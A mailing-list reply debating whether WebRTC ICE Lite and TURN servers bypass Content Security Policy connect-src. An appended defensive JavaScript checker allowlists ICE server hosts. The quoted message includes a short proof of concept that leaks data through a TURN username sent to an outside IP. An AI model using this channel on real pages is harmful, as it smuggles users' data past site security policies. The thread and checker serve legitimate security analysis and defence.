Re: webRTC and Content Security Policy connect-src

On 12 January 2018 at 13:06, Sergio Garcia Murillo
<sergio.garcia.murillo@gmail.com> wrote:
> On 12/01/2018 13:01, Iñaki Baz Castillo wrote:
>
>> To summarize: The current issue with ICE Lite is that it's not needed
>> for the browser (ICE controlling) to provide the remote with the
>> browser *internally* and *dynamically* generated tokens (such as the
>> ice-ufrag). With my proposal above, this would change so the JS should
>> always signal its local ice-ufrag to the remote (otherwise ICE
>> responses would be discarded). And for that, the JS must send it via
>> HTTP/WebSocket, so habemus CSP rules to block them.
>

> As I already pointed out in the issue, it is possible to leak small amounts
> of data just with:
>
> var pc = new RTCPeerConnection({"iceServers":[{"urls":["turn:74.125.140.127:19305?transport=udp"],"username":"_all_your_data_belongs_to_us","credential":"."}]});
> pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp));

And as I already pointed out, my proposal above was just intended to
make both Full ICE and ICE Lite equally safe. :)

Leaking data via TURN credentials is a different subject (no less important).

Received on Friday, 12 January 2018 12:27:46 UTC
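A defender-side check for the gap the thread describes, added here as an example and not code from the thread or from any project: it parses every ICE server URI in an RTCPeerConnection configuration and reports hosts outside an allowlist, roughly what a connect-src style rule for ICE servers would do, with an optional hook that refuses to build a peer connection from a failing config. The function names, the allowlist and the 64-character username ceiling are constructed for the demo.

```javascript
// Added example (not from the thread): allowlist check for ICE/TURN servers,
// modelled on what a "connect-src for RTCPeerConnection" would enforce.
// Helper names, allowlist values and the username ceiling are constructed.

// RFC 7064/7065 style URI: scheme:host[:port][?query]; IPv6 hosts in brackets.
const ICE_URL_RE = /^(stuns?|turns?):(\[[^\]]+\]|[^:?]+)(?::(\d{1,5}))?(?:\?(.*))?$/i;

// Parse one ICE server URI; returns null when it is not a stun/turn URI.
function parseIceUrl(url) {
  const m = ICE_URL_RE.exec(url);
  if (!m) return null;
  return { scheme: m[1].toLowerCase(), host: m[2].toLowerCase(),
           port: m[3] ? Number(m[3]) : null, query: m[4] || '' };
}

// Check an RTCConfiguration against an allowlist of ICE server hosts.
// Returns { ok, violations }; each violation names the offending URL.
function checkIceServers(config, allowedHosts, opts = {}) {
  const maxUsername = opts.maxUsernameLength || 64; // heuristic, constructed
  const allowed = new Set(allowedHosts.map((h) => h.toLowerCase()));
  const violations = [];
  for (const server of (config && config.iceServers) || []) {
    const urls = Array.isArray(server.urls) ? server.urls : [server.urls];
    for (const url of urls) {
      const parsed = parseIceUrl(String(url));
      if (!parsed) { violations.push({ url, reason: 'unparseable ICE URL' }); continue; }
      if (!allowed.has(parsed.host)) {
        violations.push({ url, reason: `host ${parsed.host} not in allowlist` });
      }
    }
    // The thread's point: username/credential are a free-form channel the
    // browser hands to the TURN server, so an unusually long one is worth flagging.
    if (typeof server.username === 'string' && server.username.length > maxUsername) {
      violations.push({ url: urls[0], reason: 'username longer than expected for this deployment' });
    }
  }
  return { ok: violations.length === 0, violations };
}

// Optional browser hook: wrap the global constructor so a failing config throws.
function installIceGuard(allowedHosts, globalObj = globalThis) {
  const Original = globalObj.RTCPeerConnection;
  if (typeof Original !== 'function') return false; // no WebRTC here (e.g. Node)
  globalObj.RTCPeerConnection = function GuardedRTCPeerConnection(config, ...rest) {
    const result = checkIceServers(config, allowedHosts);
    if (!result.ok) throw new Error('ICE server policy violation: ' + JSON.stringify(result.violations));
    return new Original(config, ...rest);
  };
  globalObj.RTCPeerConnection.prototype = Original.prototype;
  return true;
}
```

A shim like this only governs the site's own code paths and can be undone by any script already running in the page, so it is a detection aid, not a substitute for the browser-enforced policy the thread argues for.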